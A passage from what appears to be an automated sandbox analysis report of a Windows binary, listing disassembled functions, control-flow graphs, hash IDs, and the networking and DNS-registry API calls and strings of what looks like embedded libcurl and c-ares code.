                                                          • Associated: 00000000.00000002.2480157187.0000000001308000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480479577.0000000001400000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480597176.00000000015C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480616581.00000000015C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                          • String ID: 0
                                                          • API String ID: 2406880114-4108050209
                                                          • Opcode ID: 6dc46a517033e058a8b3445151669b8716470ecbea8891e33ce7c2bae0a0e6fb
                                                          • Instruction ID: e89cd780c6a39e1d6d991ebacf174543b9f9389e95bac9da76ad858b8e88f486
                                                          • Opcode Fuzzy Hash: 6dc46a517033e058a8b3445151669b8716470ecbea8891e33ce7c2bae0a0e6fb
                                                          • Instruction Fuzzy Hash: CEE117B49053099FDB10EF68D9856AEBBF4EF84300F408869E888E7395E774D984CF52
                                                          Function 00A4B180 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 323COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1586 a4b180-a4b195 1587 a4b3e0-a4b3e7 1586->1587 1588 a4b19b-a4b1a2 1586->1588 1589 a4b1b0-a4b1b9 1588->1589 1589->1589 1590 a4b1bb-a4b1bd 1589->1590 1590->1587 1591 a4b1c3-a4b1d0 1590->1591 1593 a4b1d6-a4b1f2 1591->1593 1594 a4b3db 1591->1594 1595 a4b229-a4b22d 1593->1595 1594->1587 1596 a4b233-a4b246 1595->1596 1597 a4b3e8-a4b417 1595->1597 1598 a4b260-a4b264 1596->1598 1599 a4b248-a4b24b 1596->1599 1605 a4b582-a4b589 1597->1605 1606 a4b41d-a4b429 1597->1606 1603 a4b269-a4b286 call a4af30 1598->1603 1600 a4b215-a4b223 1599->1600 1601 a4b24d-a4b256 1599->1601 1600->1595 1604 a4b315-a4b33c call d08b00 1600->1604 1601->1603 1614 a4b2f0-a4b301 1603->1614 1615 a4b288-a4b2a3 call a4b060 1603->1615 1617 a4b342-a4b347 1604->1617 1618 a4b3bf-a4b3ca 1604->1618 1609 a4b435-a4b44c call a4b590 1606->1609 1610 a4b42b-a4b433 call a4b590 1606->1610 1626 a4b44e-a4b456 call a4b590 1609->1626 1627 a4b458-a4b471 call a4b590 1609->1627 1610->1609 1614->1600 1630 a4b307-a4b310 1614->1630 1633 a4b200-a4b213 call a4b020 1615->1633 1634 a4b2a9-a4b2c7 getsockname call a4b020 1615->1634 1623 a4b384-a4b38f 1617->1623 1624 a4b349-a4b358 1617->1624 1628 a4b3cc-a4b3d9 1618->1628 1623->1618 1632 a4b391-a4b3a5 1623->1632 1631 a4b360-a4b382 1624->1631 1626->1627 1643 a4b473-a4b487 1627->1643 1644 a4b48c-a4b4a7 1627->1644 1628->1587 1630->1628 1631->1623 1631->1631 1639 a4b3b0-a4b3bd 1632->1639 1633->1600 1645 a4b2cc-a4b2dd 1634->1645 1639->1618 1639->1639 1643->1605 1647 a4b4b3-a4b4cb call a4b660 1644->1647 1648 a4b4a9-a4b4b1 call a4b660 1644->1648 1645->1600 1646 a4b2e3 1645->1646 1646->1630 1653 a4b4cd-a4b4d5 call a4b660 1647->1653 1654 a4b4d9-a4b4f5 call a4b660 1647->1654 1648->1647 1653->1654 1659 a4b4f7-a4b50b 1654->1659 1660 a4b50d-a4b52b call a4b770 * 2 1654->1660 1659->1605 1660->1605 1665 a4b52d-a4b531 1660->1665 1666 a4b580 1665->1666 1667 a4b533-a4b53b 1665->1667 1666->1605 1668 a4b53d-a4b547 1667->1668 1669 a4b578-a4b57e 1667->1669 1668->1669 1670 a4b549-a4b54d 1668->1670 1669->1605 1670->1669 1671 a4b54f-a4b558 1670->1671 1671->1669 1672 a4b55a-a4b576 call a4b870 * 2 1671->1672 1672->1605 1672->1669
                                                          APIs
                                                          • getsockname.WS2_32(-00000020,-00000020,?), ref: 00A4B2B7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          • Associated: 00000000.00000002.2479598840.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001057000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480137023.000000000105C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001302000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001308000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480479577.0000000001400000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480597176.00000000015C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480616581.00000000015C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID: getsockname
                                                          • String ID: XL$`L$ares__sortaddrinfo.c$cur != NULL
                                                          • API String ID: 3358416759-1503282396
                                                          • Opcode ID: cb11c520e848b87ed14d222cbb2bb18860e011982feb7c4d2da257c652827834
                                                          • Instruction ID: fb0b5b49ddb937e4ba94ec221348694723d705c9ccf923deb06afb9debf58723
                                                          • Opcode Fuzzy Hash: cb11c520e848b87ed14d222cbb2bb18860e011982feb7c4d2da257c652827834
                                                          • Instruction Fuzzy Hash: DBC17E796143159FD718DF24C980A6AB7E1EFC8314F05896CF84A8B3A2DB34ED45CBA1
                                                          Function 009905B0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 377networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1730 9905b0-9905b7 1731 9905bd-9905d4 1730->1731 1732 9907ee 1730->1732 1733 9905da-9905e6 1731->1733 1734 9907e7-9907ed 1731->1734 1733->1734 1735 9905ec-9905f0 1733->1735 1734->1732 1736 9907c7-9907cc 1735->1736 1737 9905f6-990620 call 997350 call 9870b0 1735->1737 1736->1734 1742 99066a-99068c call 9bdec0 1737->1742 1743 990622-990624 1737->1743 1748 990692-9906a0 1742->1748 1749 9907d6-9907e3 call 997380 1742->1749 1745 990630-990655 call 9870d0 call 9903c0 call 997450 1743->1745 1774 99065b-990668 call 9870e0 1745->1774 1775 9907ce 1745->1775 1751 9906a2-9906a4 1748->1751 1752 9906f4-9906f6 1748->1752 1749->1734 1755 9906b0-9906e4 call 9973b0 1751->1755 1757 9906fc-9906fe 1752->1757 1758 9907ef-99082b call 993000 1752->1758 1755->1749 1773 9906ea-9906ee 1755->1773 1763 99072c-990754 1757->1763 1771 990a2f-990a35 1758->1771 1772 990831-990837 1758->1772 1764 99075f-99078b 1763->1764 1765 990756-99075b 1763->1765 1785 990791-990796 1764->1785 1786 990700-990703 1764->1786 1769 99075d 1765->1769 1770 990707-990719 WSAEventSelect 1765->1770 1776 990723-990726 1769->1776 1770->1749 1783 99071f 1770->1783 1781 990a3c-990a52 1771->1781 1782 990a37-990a3a 1771->1782 1778 990839-99084c call 996fa0 1772->1778 1779 990861-99087e 1772->1779 1773->1755 1780 9906f0 1773->1780 1774->1742 1774->1745 1775->1749 1776->1758 1776->1763 1796 990a9c-990aa4 1778->1796 1797 990852 1778->1797 1798 990882-99088d 1779->1798 1780->1752 1781->1749 1788 990a58-990a81 call 992f10 1781->1788 1782->1781 1783->1776 1785->1786 1790 99079c-9907c2 call 9876a0 1785->1790 1786->1770 1788->1749 1799 990a87-990a97 call 996df0 1788->1799 1790->1786 1796->1749 1797->1779 1801 990854-99085f 1797->1801 1802 990970-990975 1798->1802 1803 990893-9908b1 1798->1803 1799->1749 1801->1798 1805 990a19-990a2c 1802->1805 1806 99097b-990989 call 9870b0 1802->1806 1807 9908c8-9908f7 1803->1807 1805->1771 1806->1805 1815 99098f-99099e 1806->1815 1813 9908f9-9908fb 1807->1813 1814 9908fd-990925 1807->1814 1816 990928-99093f 1813->1816 1814->1816 1817 9909b0-9909c1 call 9870d0 1815->1817 1823 9908b3-9908c2 1816->1823 1824 990945-99096b 1816->1824 1821 9909a0-9909ae call 9870e0 1817->1821 1822 9909c3-9909c7 1817->1822 1821->1805 1821->1817 1825 9909e8-990a03 WSAEnumNetworkEvents 1822->1825 1823->1802 1823->1807 1824->1823 1828 9909d0-9909e6 WSAEventSelect 1825->1828 1829 990a05-990a17 1825->1829 1828->1821 1828->1825 1829->1828
                                                          APIs
                                                          • WSAEventSelect.WS2_32(?,8508C483,?), ref: 00990712
                                                          • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 009909DD
                                                          • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 009909FC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          • Associated: 00000000.00000002.2479598840.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001057000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480137023.000000000105C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001302000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001308000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480479577.0000000001400000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480597176.00000000015C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480616581.00000000015C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID: EventSelect$EnumEventsNetwork
                                                          • String ID: multi.c
                                                          • API String ID: 2170980988-214371023
                                                          • Opcode ID: a66db29af5bde2df2314ba491a401e37af4b03bb82766b201dd68a3b995e258d
                                                          • Instruction ID: a318af10ec0da64d138d607574c8c1bb299a6f317553c362eb00eb1c92cb14e1
                                                          • Opcode Fuzzy Hash: a66db29af5bde2df2314ba491a401e37af4b03bb82766b201dd68a3b995e258d
                                                          • Instruction Fuzzy Hash: 5ED1CF716083019FEB10DF68CC81B6BB7E9BFD4358F04482CF9A486292E775E954CB92
                                                          Function 00996FA0 Relevance: 1.8, APIs: 1, Instructions: 261COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          • Associated: 00000000.00000002.2479598840.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001057000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480137023.000000000105C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001302000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001308000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480479577.0000000001400000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480597176.00000000015C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480616581.00000000015C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 55cd4f0d7560e13cf1814de1e4c2e54d7c0c53143d78bc6d79f74d9fee5125ce
                                                          • Instruction ID: 5b2266dae7ad7de8bdf6cfbbdf5a3a13c6e44e73ddab01bc8ebf2be7e5eabbec
                                                          • Opcode Fuzzy Hash: 55cd4f0d7560e13cf1814de1e4c2e54d7c0c53143d78bc6d79f74d9fee5125ce
                                                          • Instruction Fuzzy Hash: 0591013062D3098BDB358BAD88907BBF2D9EFC5364F148B2CE8A9461D4EF749C50D691
                                                          Function 00A4A8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,00A3712E,?,?,?,00001001,00000000), ref: 00A4A90D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          • Associated: 00000000.00000002.2479598840.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001057000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480137023.000000000105C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001302000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001308000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480479577.0000000001400000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480597176.00000000015C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480616581.00000000015C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID: recvfrom
                                                          • String ID:
                                                          • API String ID: 846543921-0
                                                          • Opcode ID: 0ebdc7364d7df4b9eed5c432c8b4cf46feb2ab5c886190ab9f97e31f4a7be29d
                                                          • Instruction ID: 30b9126ae089cb6482a0024e7138219a0e46b9ca4b6fce04ec80db41501c5527
                                                          • Opcode Fuzzy Hash: 0ebdc7364d7df4b9eed5c432c8b4cf46feb2ab5c886190ab9f97e31f4a7be29d
                                                          • Instruction Fuzzy Hash: 42F01D79218358AFD2109F41DC44DABBBEDEFC9754F05455DF958132119371AE10CAB2
                                                          Function 00A3A440 Relevance: 53.6, APIs: 19, Strings: 11, Instructions: 1066registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00A3AA19
                                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00A3AA4C
                                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 00A3AA97
                                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00A3AAE9
                                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00A3AB30
                                                          • RegCloseKey.KERNELBASE(?), ref: 00A3AB6A
                                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 00A3AB82
                                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 00A3AC46
                                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 00A3AD0A
                                                          • RegEnumKeyExA.KERNELBASE ref: 00A3AD8D
                                                          • RegCloseKey.KERNELBASE(?), ref: 00A3ADD9
                                                          • RegEnumKeyExA.KERNELBASE ref: 00A3AE08
                                                          • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 00A3AE2A
                                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00A3AE54
                                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00A3AF63
                                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00A3AFB2
                                                          • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 00A3B072
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          • Associated: 00000000.00000002.2479598840.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001057000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480137023.000000000105C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001302000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001308000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480479577.0000000001400000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480597176.00000000015C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480616581.00000000015C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID: QueryValue$Open$CloseEnum
                                                          • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces$XL$\L$`L
                                                          • API String ID: 4217438148-3520131594
                                                          • Opcode ID: 65911430438e3dd6cd2d0e94148aee6376e73f9e189d0153604a45b7b994ebae
                                                          • Instruction ID: 761494c8693c975f0978dfa8add029ffe285925b6b768136cd53fdbe1b5d7190
                                                          • Opcode Fuzzy Hash: 65911430438e3dd6cd2d0e94148aee6376e73f9e189d0153604a45b7b994ebae
                                                          • Instruction Fuzzy Hash: 3772DEB1608311AFE7209B24DD82B6BB7E8EF95700F14482CF985D72A1E775E944CB63
                                                          Function 009BA550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 009BA832
                                                          Strings
                                                          • @, xrefs: 009BA8F4
                                                          • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 009BA6CE
                                                          • Bind to local port %d failed, trying next, xrefs: 009BAFE5
                                                          • Local port: %hu, xrefs: 009BAF28
                                                          • Trying %s:%d..., xrefs: 009BA7C2, 009BA7DE
                                                          • Couldn't bind to '%s' with errno %d: %s, xrefs: 009BAE1F
                                                          • Could not set TCP_NODELAY: %s, xrefs: 009BA871
                                                          • Name '%s' family %i resolved to '%s' family %i, xrefs: 009BADAC
                                                          • cf_socket_open() -> %d, fd=%d, xrefs: 009BA796
                                                          • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 009BAD0A
                                                          • Local Interface %s is ip %s using address family %i, xrefs: 009BAE60
                                                          • bind failed with errno %d: %s, xrefs: 009BB080
                                                          • @, xrefs: 009BAC42
                                                          • cf-socket.c, xrefs: 009BA5CD, 009BA735
                                                          • Trying [%s]:%d..., xrefs: 009BA689
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          • Associated: 00000000.00000002.2479598840.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001057000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2479623411.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480137023.000000000105C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.000000000105E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001302000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.0000000001308000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480157187.00000000013FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480479577.0000000001400000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480597176.00000000015C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2480616581.00000000015C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID: setsockopt
                                                          • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                          • API String ID: 3981526788-2373386790
                                                          • Opcode ID: 5812739dbec0353945482620673d63444fa2c08ed4f570b0bf478278aa169440
                                                          • Instruction ID: 7529a036fab09f0abb173b511006687d31cc8af7c96b7661b0548d293411a5fd
                                                          • Opcode Fuzzy Hash: 5812739dbec0353945482620673d63444fa2c08ed4f570b0bf478278aa169440
                                                          • Instruction Fuzzy Hash: 8B62F471508341ABE721CF24C986BEBB7E9BF91324F04491DF98897292E771E845CB93
                                                          Function 00A49740 Relevance: 20.0, APIs: 3, Strings: 8, Instructions: 743registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 857 a49740-a4975b 858 a49780-a49782 857->858 859 a4975d-a49768 call a478a0 857->859 860 a49914-a4994e call d08b70 RegOpenKeyExA 858->860 861 a49788-a497a0 call d08e00 call a478a0 858->861 868 a4976e-a49770 859->868 869 a499bb-a499c0 859->869 872 a49950-a49955 860->872 873 a4995a-a49992 RegQueryValueExA RegCloseKey call d08b98 860->873 861->869 874 a497a6-a497c5 861->874 868->874 875 a49772-a4977e 868->875 870 a49a0c-a49a15 869->870 872->870 887 a49997-a499b5 call a478a0 873->887 880 a49827-a49833 874->880 881 a497c7-a497e0 874->881 875->861 883 a49835-a4985c call a3e2b0 * 2 880->883 884 a4985f-a49872 call a45ca0 880->884 885 a497f6-a49809 881->885 886 a497e2-a497f3 call d08b50 881->886 883->884 897 a499f0 884->897 898 a49878-a4987d call a477b0 884->898 885->880 896 a4980b-a49810 885->896 886->885 887->869 887->874 896->880 900 a49812-a49822 896->900 903 a499f5-a499fb call a45d00 897->903 904 a49882-a49889 898->904 900->870 912 a499fe-a49a09 903->912 904->903 908 a4988f-a4989b call a34fe0 904->908 908->897 916 a498a1-a498c3 call d08b50 call a478a0 908->916 912->870 921 a499c2-a499ed call a3e2b0 * 2 916->921 922 a498c9-a498db call a3e2d0 916->922 921->897 922->921 927 a498e1-a498f0 call a3e2d0 922->927 927->921 932 a498f6-a49905 call a463f0 927->932 937 a49f66-a49f7f call a45d00 932->937 938 a4990b-a4990f 932->938 937->912 940 a49a3f-a49a5a call a46740 call a463f0 938->940 940->937 946 a49a60-a49a6e call a46d60 940->946 949 a49a70-a49a94 call a46200 call a467e0 call a46320 946->949 950 a49a1f-a49a39 call a46840 call a463f0 946->950 961 a49a16-a49a19 949->961 962 a49a96-a49ac6 call a3d120 949->962 950->937 950->940 961->950 963 a49fc1 961->963 968 a49ae1-a49af7 call a3d190 962->968 969 a49ac8-a49adb call a3d120 962->969 965 a49fc5-a49ffd call a45d00 call a3e2b0 * 2 963->965 965->912 968->950 975 a49afd-a49b09 call a34fe0 968->975 969->950 969->968 975->963 981 a49b0f-a49b29 call a3e730 975->981 986 a49f84-a49f88 981->986 987 a49b2f-a49b3a call a478a0 981->987 989 a49f95-a49f99 986->989 987->986 994 a49b40-a49b54 call a3e760 